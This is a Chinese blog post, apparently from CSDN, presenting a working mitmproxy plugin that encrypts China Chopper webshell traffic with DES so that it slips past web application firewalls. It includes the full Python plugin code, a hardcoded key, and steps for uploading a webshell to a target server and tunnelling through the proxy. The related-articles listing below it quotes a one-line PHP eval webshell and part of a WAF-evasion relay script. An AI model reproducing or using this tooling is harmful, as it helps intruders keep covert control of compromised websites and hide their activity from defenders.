CaidaoMitmProxy:基于HTTP代理中转菜刀过WAF

最新推荐文章于 2021-10-14 09:17:38 发布
最新推荐文章于 2021-10-14 09:17:38 发布
阅读量369 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmardrid/article/details/114329670
版权

基于HTTP代理中转菜刀过WAF

前言

在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。本文就通过在不修改程序源码,不重复造轮子,代码量最少的前提下实现类似冰蝎的加密传输。

思路

如果我们要实现类似冰蝎那种数据加密传输必定要拦截菜刀的发送数据。如何拦截呢?这里就可以想到中间人劫持了。利用中间人拦截了菜刀的传输数据然后进行自定义加密再发送给webshell。这不就成功了吗?类似下图

 

分割线上是菜刀正常的传输,下面是我们要实现的加密传输。在加密算法的选择上我选择了DES算法。

原因如下:

1. PHP 本版兼容性最高,代码量少且简单,不依赖openssl 2. 在其他脚本中也是相对较少的代码量和较好的兼容性

实现

基于菜刀20160622版本修改和测试。

利用MitmProxy作为中间人代理,只需要写个插件即可实现。

MitmProxy

安装(windows用户务必通过PIP安装mitmproxy,不然插件会出现找不到模块的错误)

pip[3] install mitmproxy pip[3] install pydes

插件代码:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import base64
import mitmproxy.http
import pyDes
import random
from urllib.parse import quote

key = "KvCb2poU"
# 加密
def encrypt_str(key,data):
    # 加密方法
    method = pyDes.des(key, pyDes.ECB,pad=None, padmode=pyDes.PAD_PKCS5)
    # 执行加密码
    k = method.encrypt(data)
    # 转base64编码并返回
    return base64.b64encode(k)

# 解密
def decrypt_str(key,data):
    method = pyDes.des(key, pyDes.ECB,pad=None, padmode=pyDes.PAD_PKCS5)
    # 对base64编码解码
    k = base64.b64decode(data)
    # 再执行Des解密并返回
    return method.decrypt(k)

class Counter:

    def __init__(self):
        pass

    def request(self, flow: mitmproxy.http.HTTPFlow):

        print(key)
        print("first req:" + str(flow.request.content))
        flow.request.content = bytes(quote(str(encrypt_str(key.encode(encoding="utf-8"), flow.request.content),encoding="UTF-8")),encoding="UTF-8")
        print("req:" + str(flow.request.content))

    def response(self,flow: mitmproxy.http.HTTPFlow):
        flow.response.content = decrypt_str(key.encode(encoding="utf-8"),flow.response.content)
        print("decrypt resp:" + str(flow.response.content,encoding="utf-8"))

addons = [
    Counter()
]

使用

  1. 将支持 DES 加密的 Webshell 上传到服务器的 Web目录
  2. 运行下列代码开启代理中转(使用 -p 可以自定以端口) Windows:mitmdump -k -s 插件路径 Linux:mitmproxy -k -s 插件路径
  3. 用Proxifier等其他工具将菜刀或者域名加进代理规则即可。默认监听是8080
  4. 用菜刀直接连接就能开始食用啦

 

Webshell和插件还有其他详情在github。

参考:

https://xz.aliyun.com/t/2739 https://github.com/ekgg/Caidao-AES-Version

securitysun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
lua-resty-waf:基于OpenResty堆栈的高性能WAF
02-03
**lua-resty-waf简介** `lua-resty-waf`是一个高效的Web应用防火墙(WAF),它构建在OpenResty平台上,利用Lua语言的强大功能为Nginx提供动态的安全策略执行。OpenResty集成了Nginx与LuaJIT,使得我们可以编写高...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
HTTP第三篇【状态码、HTTP中转应用程序】
weixin_30790841的博客
09-20 78
状态码简述 2XX 一般是请求成功 200 正常处理 204 成功处理,但服务器没有新数据返回,显示页面不更新 206 对服务器进行范围请求,只返回一部分数据 3XX 一般表示重定向 301 请求的资源已分配了新的URI中,URL地址改变了。【永久重定向】 302 请求的资源临时分配了新的URI中,URL地址没变【转发】 303 与302相同的功能,但明确客户端应该采用GET方式来获取资源 304...
php中转菜刀脚本过狗免杀
weixin_30558305的博客
06-16 323
<?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode(","",$v); ...
python http代理_python HTTP代理中转服务
weixin_39884100的博客
12-05 848
不知道该取一个什么名字,所以叫HTTP代理中转服务,其实就是将客户端HTTP请求转发给代理IP,再把代理IP的响应返回给客户端,这个有什么用处呢?很简单,像python的爬虫为了防爬会使用代理IP,代码如下:import requestsdef jc_proxies():try:s = requests.session()proxies={"http": "x.x.x.x:yyyy",}r = s...
nodejs搭建http(s)中转服务
阿祥_CSDN
07-13 1435
本文主要介绍如何使用 nodejs 搭建 http(s)中转服务,本文所写内容仅以学习为目的,请勿作为其他用途。
使用HttpClient做请求响应中转
预流
08-29 1316
现网中有个应用A,之前一直是请求透传访问的,最近从安全方面考虑将该A应用不直接暴露给客户端访问,而是从有一定安全校验机制的应用B做访问入口,由B的后端将HTTP请求中转到A,再将A的响应通过B输出到客户端。这种方案有两个好处,1.可以利用应用B已有的安全校验机制,而不需要应用A再复制一份安全校验。2.原来在客户端需要同时访问应用A和应用B,这就涉及到浏览器的同源策略的安全性问题,所以在配置上必...
waf:一个基于NodeJS的简化waf。 是大学时期的作品
05-18
基于NodeJS的web应用防火墙(waf)兼顾前端和服务器端的waf,能有效抵御SQL注入攻击以及XSS攻击。创新点在于前端防火墙的设计及实现,并且捕获可能存在的漏洞点,实时预警。当前实现了:基于NodeJS的代理服务器前端...
what-the-waf:更努力地绕过那个 WAF..
07-03
通过该 WAF 找到自己的方式! -- Burp 1.6+ 扩展 #Info 最新版本:1.4(测试版) 当前 BApp Store 版本:1.4(测试版) #A WAF 故事###我们信任 WAF [Tom 很高兴,因为他为 Lisa 的网站配置了 WAF。 他告诉丽莎,...
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin通过字符集编码绕过waf的burp插件因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。预览ASP.NET+IIS使用说明其实这种方法很早就出来了...
数据中转服务工具。
10-17
实现跨网络数据通讯,解决公网固定IP的问题,能够很好的解决现场DTU无线设备联调测试的问题!
使用菜刀HTTP流量代理绕过WAF
focus on security
03-17 951
在实际的渗透测试中,Webshell真正免杀的第一步就是确保 Webshell 的源脚本免杀,其次是传输内容的编码混淆。 在实际的渗透过程中,我们常常因为WAF而头疼。源码免杀了而传输层却被拦截了实在难受。虽然现在很多优秀的应用。如蚁剑,C刀,冰蝎等。本文就通过在不修改程序源码,不重复造轮子,代码量最少的前提下实现类似冰蝎的加密传输。 但仅将 request 包内容进行编码,发送到服务器是远远不够的;部分 WAF 或者信息防泄漏系统还会对网页的 response 返回包流量进行检测。这时候,无论源.
caidao的用法
qq_45883910的博客
10-14 1161
工具:owasp虚拟机、中国菜刀、win7 x86系统虚拟机。 环境准备: 下载owasp用VMare打开;(靶机) win7上下载安装中国菜刀。(攻击机) 在win7上创建一个1.php文件内容为一句话木马:<?php @eval($_POST[‘cmd’]);?>【这是webshell ,网页后门】 打开owasp虚拟机,获得IP。 然后在win7上访问此IP,点击DVWA靶场,选择文件上传(low等级),将1.php上传,复制下面上传成功的路径,将网址处#号替换成此路径,进行1.php文
中转api,一个用于转发用户的Http请求的工具
热门推荐
熊诗言的博客
07-27 1万+
有时候由于限制或者其他原因,不能直接访问外部的接口,我们就需要一个中转站,用于中转用户的请求,将用户的请求发送到目的地址,然后返回用户需要的结果。 众所周知,Http请求分请求头和请求体,响应也分响应头和响应体。所以我们中转的时候一般需要设置请求头、请求体,但是响应只需要返回响应体即可。我们可以使用json来描述我们的参数和响应。 import java.io.IOException;...
HTTP第五篇 HTTP实现客户端和服务端通信和转发
龍逸
03-18 1574
域名访问请求: 在互联网上,域名通过 DNS 服务映射到 IP 地址(域名解析)之后访问目标网站。可见,当请求发送到服务 器时,已经是以 IP 地址形式访问了。 通信数据转发程序 :代理、网关、隧道 代理 代理是一种有转发功能的应用程序,它扮演了位于服务器和客户端“中间人”的角色,接收由客户端发送的请求 并转发给服务器,同时也接收服务器返回的响应并转发给客户端。 ...
用Proxifier只代理PC端部分软件
十一姐的博客
03-08 8549
mitmproxy监测,proxifier代理部分软件 proxifier下载 1、添加代理信息 (1)打开cmd窗口使用ipconfig命令:查询ipv4地址 (2)打开Proxifier>配置文件>代理服务器:添加ipv4地址、端口、类型 2、配置规则 (1)选择需要代理的软件,如微信,右击查看属性,找到软件可执行文件名称如WeChat.exe: (2)打开Prox...
HTTP的一些总结
hdughy的博客
08-27 146
目录 报文 报文方法 响应报文的状态码 中转服务器 HTTPS ​​​​​​​ 报文 报文 用于 HTTP 协议交互的信息被称为 HTTP 报文。 请求端(客户端) 的HTTP 报文叫做请求报文, 响应端(服务器端) 的叫做响应报文 请求报文 请求报文分为报文首部,空行,报文主体。 报文首部分为请求行,首部字段,其他 请求行分为请求方法,请求URI,http协议版本;首部字段分为请求首部字段,通用首部字段,实体首部字段 报文主体使用键值对的形式...
使用HttpClient实现请求转发功能
莫等闲的专栏
09-12 1万+
由于移动端要显示业务系统的数据,但是业务系统众多,如果直接和业务系统交互,会紧耦合,杂乱无章,不好管理,特编写请求转发组件,实现统一中转
通过日志记录查看一句话/菜刀是否被免杀情况
per_se_veran_ce的博客
09-14 477
1、先试着上传一句话木马1.php <?php @eval($_POST([cmd]);?> 打开目标机查看安全狗日志 可以看出,安全狗策略禁止上传.php文件 2、马被免杀,菜刀没被免杀 可以考虑更改后缀名为.html再次上传 上传成功 打开目标机查看安全狗日志 出现chooper工具这一句话,证明马被免杀,菜刀工具没被免杀 3、菜刀免杀,马没免杀 在使用菜刀连接时连接...
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值